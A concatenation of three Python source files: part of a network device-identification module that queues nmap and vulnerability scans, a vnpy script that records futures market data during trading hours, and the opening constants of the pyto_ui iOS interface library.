elif "SERVICE" in rawEvidence.keys():
event["SIGNATURE"] = [rawEvidence["SERVICE"]]
event["STATUS"] = ["New Evidence"]
elif "Active" in fromWho:
event["SIGNATURE"] = ["Active"]
if "SCAN_NAME" in rawEvidence.keys():
event["SIGNATURE"] = [rawEvidence["SCAN_NAME"]]
fr = open("{0}scans.json".format(scans_path), "r", encoding="utf-8")
scansDict = json.loads(fr.read())
fr.close()
scanDict = helper.getNested(scansDict, rawEvidence["SCAN_NAME"])
if mysteryDevice in dbManager.select(S_DB_FILE, "IDENTIFIED").get("IP", []) and scanDict != False and helper.singleInList("vulnerability", scanDict.get("TYPE", [])):
event["TYPE"] = ["VULNERABILITY"]
event["STATUS"] = ["Results Received"]
event["INFO"] = [json.dumps(newEvidence)]
self.DBManager.insert(EVENTS_DB_FILE, eventTimestamp, event)
printD("inference inserting new evidence for ip {0}".format(mysteryDevice))
# insert new evidence into DB (as is, not sanitized)
self.DBManager.insert(E_DB_FILE, mysteryDevice, newEvidence)
# check if NA vendor needs to be removed
if "VENDOR" in newEvidence.keys() and "NA" not in newEvidence["VENDOR"]:
if "VENDOR" in existingEvidence.keys() and "NA" in existingEvidence["VENDOR"]:
self.DBManager.removeVal(E_DB_FILE, mysteryDevice, "VENDOR", "NA")
# check if identified
if "MODEL" in newEvidence.keys():
self.DBManager.insert(S_DB_FILE, "IDENTIFIED", {"IP": [mysteryDevice]})
self.DBManager.removeVal(S_DB_FILE, "ID_QUEUE", "IP", mysteryDevice)
self.DBManager.removeVal(S_DB_FILE, "DECK", "IP", mysteryDevice)
deviceProfile = dbManager.select(D_DB_FILE, newEvidence["MODEL"][0])
if "DEVICE_TYPE" in deviceProfile.keys():
newEvidence["DEVICE_TYPE"] = deviceProfile["DEVICE_TYPE"]
self.DBManager.insert(E_DB_FILE, mysteryDevice, newEvidence)
# add IP to queue to be processed
printD("receive before() - ID_QUEUE: {0}".format(dbManager.select(S_DB_FILE, "ID_QUEUE").get("IP", [])))
if mysteryDevice not in dbManager.select(S_DB_FILE, "IDENTIFIED").get("IP", []):
self.DBManager.insert(S_DB_FILE, "DECK", {"IP": [mysteryDevice]})
self.DBManager.insert(S_DB_FILE, "ID_QUEUE", {"IP": [mysteryDevice]})
printD("receive after() - ID_QUEUE: {0}".format(dbManager.select(S_DB_FILE, "ID_QUEUE").get("IP", [])))
scan = {}
scan["PARAMS"] = {"key": "testing"}
# self.publish_request("active.requests.pacific", scan["PARAMS"])
# preps vuln queue
if mysteryDevice in dbManager.select(S_DB_FILE, "IDENTIFIED").get("IP", []):
printD("SN: New evidence: {}".format(newEvidence))
printD("SN: Device is identified: {}".format(mysteryDevice))
if mysteryDevice not in self.ServiceProcessor.processStarted.keys():
self.ServiceProcessor.serviceInfo[mysteryDevice] = protocols = self.getProtocols(mysteryDevice)
# Kick off nmap scan
pts = []
for service, port in protocols.items():
pts.append(port)
printD("SN: starting Nmap Scan for mystery device: {}, ports: {}".format(mysteryDevice, pts))
self.startNmapScan(mysteryDevice, pts)
self.ServiceProcessor.processStarted[mysteryDevice] = True
# check if certain scan "nmap_service_scan" came back
scanName = "nmap_service_scan"
if scanName in dbManager.select(E_DB_FILE, mysteryDevice).get("SCAN_NAME", []):
printD("SN: nmap_service_scan received. mysteryDevice: {}, new evidence: {}".format(mysteryDevice, newEvidence))
# Check if port done with vulnerabilities check
try:
# printD("SN: IdentifiedVulnerabilities ports: {}".format(self.identifiedVulnerabilities))
protocols = self.ServiceProcessor.serviceInfo[mysteryDevice]
vulnProtocols = self.getVulnerabilityPorts(mysteryDevice)
printD("SN: IdentifiedVulnerabilities device: {}, ports: {}".format(mysteryDevice, vulnProtocols))
keys_to_delete = []
for k, p in protocols.items():
if p in vulnProtocols:
printD("SN: Port {} on Device: {} is vulnerability scanned.".format(p, mysteryDevice))
keys_to_delete.append(k)
for k in keys_to_delete:
del protocols[k]
except KeyError:
pass
for service, port in protocols.items():
ip_port_service = "{}|{}|{}".format(mysteryDevice, port, service)
#self.newPortEvidenceQueue.put(mysteryDevice, port, service)
entries = dbManager.select(S_DB_FILE, "VULN_QUEUE").get("IP_PORT_SERVICE", [])
printD("SN: db entries: {}, ip_port_service: {}".format(entries, ip_port_service))
if ip_port_service not in entries:
self.DBManager.insert(S_DB_FILE, "VULN_QUEUE", {"IP_PORT_SERVICE": [ip_port_service]})
printD("SN: ip_port_service: {}".format(ip_port_service))
#printD("SN: AFTER putting newPortEvidenceQueue: {}".format(self.newPortEvidenceQueue))
printD("inference.receive() - exiting")
def getVulnerabilityPorts(self, mysteryDevice):
vulnProtococols = set()
ip_ports = dbManager.select(S_DB_FILE, "VULN_IDENTIFIED").get("IP_PORT", [])
for ip_port in ip_ports:
ip, port = ip_port.split('_')
if ip == mysteryDevice:
vulnProtococols.add(port)
return vulnProtococols
|
runDataRecording.py
|
# encoding: UTF-8
from __future__ import print_function
import multiprocessing
from time import sleep
from datetime import datetime, time
from vnpy.event import EventEngine2
from vnpy.trader.vtEvent import EVENT_LOG, EVENT_ERROR
from vnpy.trader.vtEngine import MainEngine, LogEngine
from vnpy.trader.gateway import ctpGateway
from vnpy.trader.app import dataRecorder
#----------------------------------------------------------------------
def processErrorEvent(event):
"""
处理错误事件
错误信息在每次登陆后,会将当日所有已产生的均推送一遍,所以不适合写入日志
"""
error = event.dict_['data']
print(u'错误代码:%s,错误信息:%s' %(error.errorID, error.errorMsg))
#----------------------------------------------------------------------
def runChildProcess():
"""子进程运行函数"""
print('-'*20)
# 创建日志引擎
le = LogEngine()
le.setLogLevel(le.LEVEL_INFO)
le.addConsoleHandler()
le.info(u'启动行情记录运行子进程')
ee = EventEngine2()
le.info(u'事件引擎创建成功')
me = MainEngine(ee)
me.addGateway(ctpGateway)
me.addApp(dataRecorder)
le.info(u'主引擎创建成功')
ee.register(EVENT_LOG, le.processLogEvent)
ee.register(EVENT_ERROR, processErrorEvent)
le.info(u'注册日志事件监听')
me.connect('CTP')
le.info(u'连接CTP接口')
while True:
sleep(1)
#----------------------------------------------------------------------
def runParentProcess():
"""父进程运行函数"""
# 创建日志引擎
le = LogEngine()
le.setLogLevel(le.LEVEL_INFO)
le.addConsoleHandler()
le.info(u'启动行情记录守护父进程')
DAY_START = time(8, 57) # 日盘启动和停止时间
DAY_END = time(15, 18)
NIGHT_START = time(20, 57) # 夜盘启动和停止时间
NIGHT_END = time(2, 33)
p = None # 子进程句柄
while True:
currentTime = datetime.now().time()
recording = False
# 判断当前处于的时间段
if ((currentTime >= DAY_START and currentTime <= DAY_END) or
(currentTime >= NIGHT_START) or
(currentTime <= NIGHT_END)):
recording = True
# 过滤周末时间段:周六全天,周五夜盘,周日日盘
if ((datetime.today().weekday() == 6) or
(datetime.today().weekday() == 5 and currentTime > NIGHT_END) or
(datetime.today().weekday() == 0 and currentTime < DAY_START)):
recording = False
# 记录时间则需要启动子进程
if recording and p is None:
le.info(u'启动子进程')
p = multiprocessing.Process(target=runChildProcess)
p.start()
le.info(u'子进程启动成功')
# 非记录时间则退出子进程
if not recording and p is not None:
le.info(u'关闭子进程')
p.terminate()
p.join()
p = None
le.info(u'子进程关闭成功')
sleep(5)
if __name__ == '__main__':
#runChildProcess()
runParentProcess()
|
pyto_ui.py
|
"""
UI for scripts
The ``pyto_ui`` module contains classes for building and presenting a native UI, in app or in the Today Widget.
This library's API is very similar to UIKit.
.. warning::
This library requires iOS / iPadOS 13.
This library may have a lot of similarities with ``UIKit``, but subclassing isn't supported very well. Instead of overriding methods, you will often need to set properties to a function. For properties, setters are what makes the passed value take effect, so instead of override the getter, you should just set properties. If you really want to subclass a :class:`View`, you can set properties from the initializer.
(Many docstrings are quoted from the Apple Documentation)
"""
from __future__ import annotations
from UIKit import UIFont as __UIFont__, UIImage as UIImage
from typing import List, Callable, Tuple
from pyto import __Class__, ConsoleViewController, PyAlert as __PyAlert__
from time import sleep
from io import BytesIO
from threading import Thread
import os
import sys
import base64
import threading
import _values
import ui_constants
import builtins
try:
from rubicon.objc import ObjCClass, CGFloat
except ValueError:
def ObjCClass(class_name):
return None
if "widget" not in os.environ:
from urllib.request import urlopen
try:
from PIL import Image
except ImportError:
pass
class __v__:
def __init__(self, string):
self.s = string
def __eq__(self, other):
return other == self.s
def __repr__(self):
return self.s
#############################
# MARK: - Objective-C Classes
#############################
__PyView__ = __Class__("PyView")
__PyControl__ = __Class__("PyControl")
__PySlider__ = __Class__("PySlider")
__PySegmentedControl__ = __Class__("PySegmentedControl")
__PySwitch__ = __Class__("PySwitch")
__PyButton__ = __Class__("PyButton")
__PyLabel__ = __Class__("PyLabel")
__UIImageView__ = __Class__("PyImageView")
__PyTextView__ = __Class__("PyTextView")
__PyTextField__ = __Class__("PyTextField")
__PyTableView__ = __Class__("PyTableView")
__PyTableViewCell__ = __Class__("PyTableViewCell")
__PyTableViewSection__ = __Class__("PyTableViewSection")
__PyWebView__ = __Class__("PyWebView")
__PyGestureRecognizer__ = __Class__("PyGestureRecognizer")
__PyColor__ = __Class__("PyColor")
__PyButtonItem__ = __Class__("PyButtonItem")
__PyTextInputTraitsConstants__ = __Class__("PyTextInputTraitsConstants")
try:
__NSData__ = ObjCClass("NSData")
except NameError:
pass
###################
# MARK: - Constants
###################
# MARK: - Gesture Recognizer Type
GESTURE_TYPE = ui_constants.GESTURE_TYPE
GESTURE_TYPE_LONG_PRESS = ui_constants.GESTURE_TYPE_LONG_PRESS
"""
A long press gesture.
"""
GESTURE_TYPE_PAN = ui_constants.GESTURE_TYPE_PAN
"""
A dragging gesture.
"""
GESTURE_TYPE_TAP = ui_constants.GESTURE_TYPE_TAP
"""
A tap gesture.
"""
# MARK: - Keyboard Appearance
KEYBOARD_APPEARANCE = ui_constants.KEYBOARD_APPEARANCE
KEYBOARD_APPEARANCE_DEFAULT = ui_constants.KEYBOARD_APPEARANCE_DEFAULT
"""
Specifies the default keyboard appearance for the current input method.
"""
KEYBOARD_APPEARANCE_LIGHT = ui_constants.KEYBOARD_APPEARANCE_LIGHT
"""
Specifies a keyboard appearance suitable for a light UI look.
"""
KEYBOARD_APPEARANCE_DARK = ui_constants.KEYBOARD_APPEARANCE_DARK
"""
Specifies a keyboard appearance suitable for a dark UI look.
"""
# MARK: - Keyboard Type
KEYBOARD_TYPE = ui_constants.KEYBOARD_TYPE
KEYBOARD_TYPE_DEFAULT = ui_constants.KEYBOARD_TYPE_DEFAULT
"""
Specifies the default keyboard for the current input method.
"""
KEYBOARD_TYPE_ASCII_CAPABLE = ui_constants.KEYBOARD_TYPE_ASCII_CAPABLE
"""
Specifies a keyboard that displays standard ASCII characters.
"""
KEYBOARD_TYPE_ASCII_CAPABLE_NUMBER_PAD = (
ui_constants.KEYBOARD_TYPE_ASCII_CAPABLE_NUMBER_PAD
)
"""
Specifies a number pad that outputs only ASCII digits.
"""
KEYBOARD_TYPE_DECIMAL_PAD = ui_constants.KEYBOARD_TYPE_DECIMAL_PAD
"""
Specifies a keyboard with numbers and a decimal point.
"""
KEYBOARD_TYPE_EMAIL_ADDRESS = ui_constants.KEYBOARD_TYPE_EMAIL_ADDRESS
"""
Specifies a keyboard optimized for entering email addresses. This keyboard type prominently features the at (“@”), period (“.”) and space characters.
"""
KEYBOARD_TYPE_NAME_PHONE_PAD = ui_constants.KEYBOARD_TYPE_NAME_PHONE_PAD
"""
Specifies a keypad designed for entering a person’s name or phone number. This keyboard type does not support auto-capitalization.
"""
KEYBOARD_TYPE_NUMBER_PAD = ui_constants.KEYBOARD_TYPE_NUMBER_PAD
"""
Specifies a numeric keypad designed for PIN entry. This keyboard type prominently features the numbers 0 through 9. This keyboard type does not support auto-capitalization.
"""
KEYBOARD_TYPE_NUMBERS_AND_PUNCTUATION = (
ui_constants.KEYBOARD_TYPE_NUMBERS_AND_PUNCTUATION
)
"""
Specifies the numbers and punctuation keyboard.
"""
KEYBOARD_TYPE_PHONE_PAD = ui_constants.KEYBOARD_TYPE_PHONE_PAD
"""
Specifies a keypad designed for entering telephone numbers. This keyboard type prominently features the numbers 0 through 9 and the “*” and “#” characters. This keyboard type does not support auto-capitalization.
"""
KEYBOARD_TYPE_TWITTER = ui_constants.KEYBOARD_TYPE_TWITTER
"""
Specifies a keyboard optimized for Twitter text entry, with easy access to the at (“@”) and hash (“#”) characters.
"""
KEYBOARD_TYPE_URL = ui_constants.KEYBOARD_TYPE_URL
"""
Specifies a keyboard optimized for URL entry. This keyboard type prominently features the period (“.”) and slash (“/”) characters and the “.com” string.
"""
KEYBOARD_TYPE_WEB_SEARCH = ui_constants.KEYBOARD_TYPE_WEB_SEARCH
"""
Specifies a keyboard optimized for web search terms and URL entry. This keyboard type prominently features the space and period (“.”) characters.
"""
# MARK: - Return Key Type
RETURN_KEY_TYPE = ui_constants.RETURN_KEY_TYPE
RETURN_KEY_TYPE_DEFAULT = ui_constants.RETURN_KEY_TYPE_DEFAULT
"""
Specifies that the visible title of the Return key is “return”.
"""
RETURN_KEY_TYPE_CONTINUE = ui_constants.RETURN_KEY_TYPE_CONTINUE
"""
Specifies that the visible title of the Return key is “Continue”.
"""
RETURN_KEY_TYPE_DONE = ui_constants.RETURN_KEY_TYPE_DONE
"""
Specifies that the visible title of the Return key is “Done”.
"""
RETURN_KEY_TYPE_EMERGENCY_CALL = ui_constants.RETURN_KEY_TYPE_EMERGENCY_CALL
"""
Specifies that the visible title of the Return key is “Emergency Call”.
"""
RETURN_KEY_TYPE_GO = ui_constants.RETURN_KEY_TYPE_GO
"""
Specifies that the visible title of the Return key is “Go”.
"""
RETURN_KEY_TYPE_GOOGLE = ui_constants.RETURN_KEY_TYPE_GOOGLE
"""
Specifies that the visible title of the Return key is “Google”.
"""
RETURN_KEY_TYPE_JOIN = ui_constants.RETURN_KEY_TYPE_JOIN
"""
Specifies that the visible title of the Return key is “Join”.
"""
RETURN_KEY_TYPE_NEXT = ui_constants.RETURN_KEY_TYPE_NEXT
"""
Specifies that the visible title of the Return key is “Next”.
"""
RETURN_KEY_TYPE_ROUTE = ui_constants.RETURN_KEY_TYPE_ROUTE
"""
Specifies that the visible title of the Return key is “Route”.
"""
RETURN_KEY_TYPE_SEARCH = ui_constants.RETURN_KEY_TYPE_SEARCH
"""
Specifies that the visible title of the Return key is “Search”.
"""
RETURN_KEY_TYPE_SEND = ui_constants.RETURN_KEY_TYPE_SEND
"""
Specifies that the visible title of the Return key is “Send”.
"""
RETURN_KEY_TYPE_YAHOO = ui_constants.RETURN_KEY_TYPE_YAHOO
"""
Specifies that the visible title of the Return key is “Yahoo”.
"""
# MARK: - Autocapitalization Type
AUTO_CAPITALIZE = ui_constants.AUTO_CAPITALIZE
AUTO_CAPITALIZE_NONE = ui_constants.AUTO_CAPITALIZE_NONE
"""
Specifies that there is no automatic text capitalization.
"""
AUTO_CAPITALIZE_ALL = ui_constants.AUTO_CAPITALIZE_ALL
"""
Specifies automatic capitalization of all characters, such as for entry of two-character state abbreviations for the United States.
"""
AUTO_CAPITALIZE_SENTENCES = ui_constants.AUTO_CAPITALIZE_SENTENCES
"""
Specifies automatic capitalization of the first letter of each sentence.
"""
AUTO_CAPITALIZE_WORDS = ui_constants.AUTO_CAPITALIZE_WORDS
"""
Specifies automatic capitalization of the first letter of each word.
"""
# MARK: - Font Text Style
FONT_TEXT_STYLE = ui_constants.FONT_TEXT_STYLE
FONT_TEXT_STYLE_BODY = ui_constants.FONT_TEXT_STYLE_BODY
"""
The font used for body text.
"""
FONT_TEXT_STYLE_CALLOUT = ui_constants.FONT_TEXT_STYLE_CALLOUT
"""
The font used for callouts.
"""
FONT_TEXT_STYLE_CAPTION_1 = ui_constants.FONT_TEXT_STYLE_CAPTION_1
"""
The font used for standard captions.
"""
FONT_TEXT_STYLE_CAPTION_2 = ui_constants.FONT_TEXT_STYLE_CAPTION_2
"""
The font used for alternate captions.
"""
FONT_TEXT_STYLE_FOOTNOTE = ui_constants.FONT_TEXT_STYLE_FOOTNOTE
"""
The font used in footnotes.
"""
FONT_TEXT_STYLE_HEADLINE = ui_constants.FONT_TEXT_STYLE_HEADLINE
"""
The font used for headings.
"""
FONT_TEXT_STYLE_SUBHEADLINE = ui_constants.FONT_TEXT_STYLE_SUBHEADLINE
"""
The font used for subheadings.
"""
FONT_TEXT_STYLE_LARGE_TITLE = ui_constants.FONT_TEXT_STYLE_LARGE_TITLE
"""
The font style for large titles.
"""
FONT_TEXT_STYLE_TITLE_1 = ui_constants.FONT_TEXT_STYLE_TITLE_1
"""
The font used for first level hierarchical headings.
"""
FONT_TEXT_STYLE_TITLE_2 = ui_constants.FONT_TEXT_STYLE_TITLE_2
"""
The font used for second level hierarchical headings.
"""
FONT_TEXT_STYLE_TITLE_3 = ui_constants.FONT_TEXT_STYLE_TITLE_3
"""
The font used for third level hierarchical headings.
"""
# MARK: - Font Size
FONT_SIZE = ui_constants.FONT_SIZE
FONT_LABEL_SIZE = ui_constants.FONT_LABEL_SIZE
"""
Returns the standard font size used for labels.
"""
FONT_BUTTON_SIZE = ui_constants.FONT_BUTTON_SIZE
"""
Returns the standard font size used for buttons.
"""
FONT_SMALL_SYSTEM_SIZE = ui_constants.FONT_SMALL_SYSTEM_SIZE
"""
Returns the size of the standard small system font.
"""
FONT_SYSTEM_SIZE = ui_constants.FONT_SYSTEM_SIZE
"""
Returns the size of the standard system font.
"""
# MARK: - Presentation Mode
PRESENTATION_MODE = ui_constants.PRESENTATION_MODE
PRESENTATION_MODE_SHEET = ui_constants.PRESENTATION_MODE_SHEET
"""
A presentation style that displays the content centered in the screen.
"""
PRESENTATION_MODE_FULLSCREEN = ui_constants.PRESENTATION_MODE_FULLSCREEN
"""
A presentation style in which the presented view covers the screen.
"""
PRESENTATION_MODE_WIDGET = ui_constants.PRESENTATION_MODE_WIDGET
"""
A presentation mode style which simulates a Today Widget. Should be used in app to preview how a widget will look.
"""
# MARK: - Appearance
APPEARANCE = ui_constants.APPEARANCE
APPEARANCE_UNSPECIFIED = ui_constants.APPEARANCE_UNSPECIFIED
"""
An unspecified interface style.
"""
APPEARANCE_LIGHT = ui_constants.APPEARANCE_LIGHT
"""
The light interface style.
"""
APPEARANCE_DARK = ui_constants.APPEARANCE_DARK
"""
The dark interface style.
"""
# MARK: - Auto Resizing
AUTO_RESIZING = ui_constants.AUTO_RESIZING
FLEXIBLE_WIDTH = ui_constants.FLEXIBLE_WIDTH
"""
Resizing performed by expanding or shrinking a view’s width.
"""
FLEXIBLE_HEIGHT = ui_constants.FLEXIBLE_HEIGHT
"""
Resizing performed by expanding or shrinking a view's height.
"""
FLEXIBLE_TOP_MARGIN = ui_constants.FLEXIBLE_TOP_MARGIN
"""
Resizing performed by expanding or shrinking a view in the direction of the top margin.
"""
FLEXIBLE_BOTTOM_MARGIN = ui_constants.FLEXIBLE_BOTTOM_MARGIN
"""
Resizing performed by expanding or shrinking a view in the direction of the bottom margin.
"""
FLEXIBLE_LEFT_MARGIN = ui_constants.FLEXIBLE_LEFT_MARGIN
"""
Resizing performed by expanding or shrinking a view in the direction of the left margin.
"""
FLEXIBLE_RIGHT_MARGIN = ui_constants.FLEXIBLE_RIGHT_MARGIN
"""
Resizing performed by expanding or shrinking a view in the direction of the right margin.
"""
# MARK: - Content Mode
CONTENT_MODE = ui_constants.CONTENT_MODE
CONTENT_MODE_SCALE_TO_FILL = ui_constants.CONTENT_MODE_SCALE_TO_FILL
"""
The option to scale the content to fit the size of itself by changing the aspect ratio of the content if necessary.
"""
CONTENT_MODE_SCALE_ASPECT_FIT = ui_constants.CONTENT_MODE_SCALE_ASPECT_FIT
"""
The option to scale the content to fit the size of the view by maintaining the aspect ratio. Any remaining area of the view’s bounds is transparent.
"""
CONTENT_MODE_SCALE_ASPECT_FILL = ui_constants.CONTENT_MODE_SCALE_ASPECT_FILL
"""
The option to scale the content to fill the size of the view. Some portion of the content may be clipped to fill the view’s bounds.
"""
CONTENT_MODE_REDRAW = ui_constants.CONTENT_MODE_REDRAW
"""
The option to redisplay the view when the bounds change by invoking the ``setNeedsDisplay()`` method.
"""
CONTENT_MODE_CENTER = ui_constants.CONTENT_MODE_CENTER
"""
The option to center the content in the view’s bounds, keeping the proportions the same.
"""
CONTENT_MODE_TOP = ui_constants.CONTENT_MODE_TOP
"""
The option to center the content aligned at the top in the view’s bounds.
"""
CONTENT_MODE_BOTTOM = ui_constants.CONTENT_MODE_BOTTOM
"""
The option to center the content aligned at the bottom in the view’s bounds.
"""
CONTENT_MODE_LEFT = ui_constants.CONTENT_MODE_LEFT
"""
The option to align the content on the left of the view.
"""
CONTENT_MODE_RIGHT = ui_constants.CONTENT_MODE_RIGHT
"""
The option to align the content on the right of the view.
"""
CONTENT_MODE_TOP_LEFT = ui_constants.CONTENT_MODE_TOP_LEFT
"""
The option to align the content in the top-left corner of the view.
"""
CONTENT_MODE_TOP_RIGHT = ui_constants.CONTENT_MODE_TOP_RIGHT
"""
The option to align the content in the top-right corner of the view.
"""
CONTENT_MODE_BOTTOM_LEFT = ui_constants.CONTENT_MODE_BOTTOM_LEFT
"""
The option to align the content in the bottom-left corner of the view.
"""
CONTENT_MODE_BOTTOM_RIGHT = ui_constants.CONTENT_MODE_BOTTOM_RIGHT
"""
The option to align the content in the bottom-right corner of the view.
"""
# MARK: - Horizontal Alignment
HORZONTAL_ALIGNMENT = ui_constants.HORZONTAL_ALIGNMENT
HORZONTAL_ALIGNMENT_CENTER = ui_constants.HORZONTAL_ALIGNMENT_CENTER
"""
Aligns the content horizontally in the center of the control.
"""
HORZONTAL_ALIGNMENT_FILL = ui_constants.HORZONTAL_ALIGNMENT_FILL
"""
Aligns the content horizontally to fill the content rectangles; text may wrap and images may be stretched.
"""
HORZONTAL_ALIGNMENT_LEADING = ui_constants.HORZONTAL_ALIGNMENT_LEADING
"""
Aligns the content horizontally from the leading edge of the control.
"""
HORZONTAL_ALIGNMENT_LEFT = ui_constants.HORZONTAL_ALIGNMENT_LEFT
"""
Aligns the content horizontally from the left of the control (the default).
"""
HORZONTAL_ALIGNMENT_RIGHT = ui_constants.HORZONTAL_ALIGNMENT_RIGHT
"""
Aligns the content horizontally from the right of the control.
"""
HORZONTAL_ALIGNMENT_TRAILING = ui_constants.HORZONTAL_ALIGNMENT_TRAILING
"""
Aligns the content horizontally from the trailing edge of the control.
"""
# MARK: - Vertical Alignment
VERTICAL_ALIGNMENT = ui_constants.VERTICAL_ALIGNMENT
VERTICAL_ALIGNMENT_BOTTOM = ui_constants.VERTICAL_ALIGNMENT_BOTTOM
"""
Aligns the content vertically at the bottom in the control.
"""
VERTICAL_ALIGNMENT_CENTER = ui_constants.VERTICAL_ALIGNMENT_CENTER
"""
Aligns the content vertically in the center of the control.
"""
VERTICAL_ALIGNMENT_FILL = ui_constants.VERTICAL_ALIGNMENT_FILL
"""
Aligns the content vertically to fill the content rectangle; images may be stretched.
"""
VERTICAL_ALIGNMENT_TOP = ui_constants.VERTICAL_ALIGNMENT_TOP
"""
Aligns the content vertically at the top in the control (the default).
"""
# MARK: - Button Type
BUTTON_TYPE = ui_constants.BUTTON_TYPE
BUTTON_TYPE_SYSTEM = ui_constants.BUTTON_TYPE_SYSTEM
"""
A system style button, such as those shown in navigation bars and toolbars.
"""
BUTTON_TYPE_CONTACT_ADD = ui_constants.BUTTON_TYPE_CONTACT_ADD
"""
A contact add button.
"""
BUTTON_TYPE_CUSTOM = ui_constants.BUTTON_TYPE_CUSTOM
"""
No button style.
"""
BUTTON_TYPE_DETAIL_DISCLOSURE = ui_constants.BUTTON_TYPE_DETAIL_DISCLOSURE
"""
A detail disclosure button.
"""
BUTTON_TYPE_INFO_DARK = ui_constants.BUTTON_TYPE_INFO_DARK
"""
An information button that has a dark background.
"""
BUTTON_TYPE_INFO_LIGHT = ui_constants.BUTTON_TYPE_INFO_LIGHT
"""
An information button that has a light background.
"""
# MARK: - Text Alignment
TEXT_ALIGNMENT = ui_constants.TEXT_ALIGNMENT
TEXT_ALIGNMENT_LEFT = ui_constants.TEXT_ALIGNMENT_LEFT
"""
Text is visually left aligned.
"""
TEXT_ALIGNMENT_RIGHT = ui_constants.TEXT_ALIGNMENT_RIGHT
"""
Text is visually right aligned.
"""
TEXT_ALIGNMENT_CENTER = ui_constants.TEXT_ALIGNMENT_CENTER
"""
Text is visually center aligned.
"""
TEXT_ALIGNMENT_JUSTIFIED = ui_constants.TEXT_ALIGNMENT_JUSTIFIED
"""
Text is justified.
"""
TEXT_ALIGNMENT_NATURAL = ui_constants.TEXT_ALIGNMENT_NATURAL
"""
Use the default alignment associated with the current localization of the app. The default alignment for left-to-right scripts is left, and the default alignment for right-to-left scripts is right.
"""
# MARK: - Line Break Mode
LINE_BREAK_MODE = ui_constants.LINE_BREAK_MODE
LINE_BREAK_MODE_BY_WORD_WRAPPING = ui_constants.LINE_BREAK_MODE_BY_WORD_WRAPPING
"""
Wrapping occurs at word boundaries, unless the word itself doesn’t fit on a single line.
"""
LINE_BREAK_MODE_BY_CHAR_WRAPPING = ui_constants.LINE_BREAK_MODE_BY_CHAR_WRAPPING
"""
Wrapping occurs before the first character that doesn’t fit.
"""
LINE_BREAK_MODE_BY_CLIPPING = ui_constants.LINE_BREAK_MODE_BY_CLIPPING
"""
Lines are simply not drawn past the edge of the text container.
"""
LINE_BREAK_MODE_BY_TRUNCATING_HEAD = ui_constants.LINE_BREAK_MODE_BY_TRUNCATING_HEAD
"""
The line is displayed so that the end fits in the container and the missing text at the beginning of the line is indicated by an ellipsis glyph. Although this mode works for multiline text, it is more often used for single line text.
"""
LINE_BREAK_MODE_BY_TRUNCATING_TAIL = ui_constants.LINE_BREAK_MODE_BY_TRUNCATING_TAIL
"""
The line is displayed so that the beginning fits in the container and the missing text at the end of the line is indicated by an ellipsis glyph. Although this mode works for multiline text, it is more often used for single line text.
"""
LINE_BREAK_MODE_BY_TRUNCATING_MIDDLE = ui_constants.LINE_BREAK_MODE_BY_TRUNCATING_MIDDLE
"""
The line is displayed so that the beginning and end fit in the container and the missing text in the middle is indicated by an ellipsis glyph. This mode is used for single-line layout; using it with multiline text truncates the text into a single line.
"""
# MARK: - Touch Type
TOUCH_TYPE = ui_constants.TOUCH_TYPE
TOUCH_TYPE_DIRECT = ui_constants.TOUCH_TYPE_DIRECT
"""
A touch resulting from direct contact with the screen.
"""
TOUCH_TYPE_INDIRECT = ui_constants.TOUCH_TYPE_INDIRECT
"""
A touch that did not result from contact with the screen.
"""
TOUCH_TYPE_PENCIL = ui_constants.TOUCH_TYPE_PENCIL
"""
A touch from Apple Pencil.
"""
# MARK: - Gesture State
GESTURE_STATE = ui_constants.GESTURE_STATE
GESTURE_STATE_POSSIBLE = ui_constants.GESTURE_STATE_POSSIBLE
"""
The gesture recognizer has not yet recognized its gesture, but may be evaluating touch events. This is the default state.
"""
GESTURE_STATE_BEGAN = ui_constants.GESTURE_STATE_BEGAN
"""
The gesture recognizer has received touch objects recognized as a continuous gesture. It sends its action message (or messages) at the next cycle of the run loop.
"""
GESTURE_STATE_CHANGED = ui_constants.GESTURE_STATE_CHANGED
"""
The gesture recognizer has received touches recognized as a change to a continuous gesture. It sends its action message (or messages) at the next cycle of the run loop.
"""
GESTURE_STATE_ENDED = ui_constants.GESTURE_STATE_ENDED
"""
The gesture recognizer has received touches recognized as the end of a continuous gesture. It sends its action message (or messages) at the next cycle of the run loop and resets its state to possible.
"""
GESTURE_STATE_CANCELLED = ui_constants.GESTURE_STATE_CANCELLED
"""
The gesture recognizer has received touches resulting in the cancellation of a continuous gesture. It sends its action message (or messages) at the next cycle of the run loop and resets its state to possible.
"""
GESTURE_STATE_RECOGNIZED = ui_constants.GESTURE_STATE_RECOGNIZED
"""
The gesture recognizer has received a multi-touch sequence that it recognizes as its gesture. It sends its action message (or messages) at the next cycle of the run loop and resets its state to possible.
"""
# MARK: - Table View Cell Style
TABLE_VIEW_CELL_STYLE = ui_constants.TABLE_VIEW_CELL_STYLE
TABLE_VIEW_CELL_STYLE_DEFAULT = ui_constants.TABLE_VIEW_CELL_STYLE_DEFAULT
"""
A simple style for a cell with a text label (black and left-aligned) and an optional image view.
"""
TABLE_VIEW_CELL_STYLE_SUBTITLE = ui_constants.TABLE_VIEW_CELL_STYLE_SUBTITLE
"""
A style for a cell with a left-aligned label across the top and a left-aligned label below it in smaller gray text.
"""
TABLE_VIEW_CELL_STYLE_VALUE1 = ui_constants.TABLE_VIEW_CELL_STYLE_VALUE1
"""
A style for a cell with a label on the left side of the cell with left-aligned and black text; on the right side is a label that has smaller blue text and is right-aligned. The Settings application uses cells in this style.
"""
TABLE_VIEW_CELL_STYLE_VALUE2 = ui_constants.TABLE_VIEW_CELL_STYLE_VALUE2
"""
A style for a cell with a label on the left side of the cell with text that is right-aligned and blue; on the right side of the cell is another label with smaller text that is left-aligned and black. The Phone/Contacts application uses cells in this style.
"""
# MARK: - Table View Cell Accessory Type
ACCESSORY_TYPE = ui_constants.ACCESSORY_TYPE
ACCESSORY_TYPE_NONE = ui_constants.ACCESSORY_TYPE_NONE
"""
No accessory view.
"""
ACCESSORY_TYPE_CHECKMARK = ui_constants.ACCESSORY_TYPE_CHECKMARK
"""
A checkmark image.
"""
ACCESSORY_TYPE_DETAIL_BUTTON = ui_constants.ACCESSORY_TYPE_DETAIL_BUTTON
"""
An information button.
"""
ACCESSORY_TYPE_DETAIL_DISCLOSURE_BUTTON = (
ui_constants.ACCESSORY_TYPE_DETAIL_DISCLOSURE_BUTTON
)
"""
An information button and a disclosure (chevron) control.
"""
ACCESSORY_TYPE_DISCLOSURE_INDICATOR = ui_constants.ACCESSORY_TYPE_DISCLOSURE_INDICATOR
"""
A chevron-shaped control for presenting new content.
"""
# MARK: - Table View Style
TABLE_VIEW_STYLE = ui_constants.TABLE_VIEW_STYLE
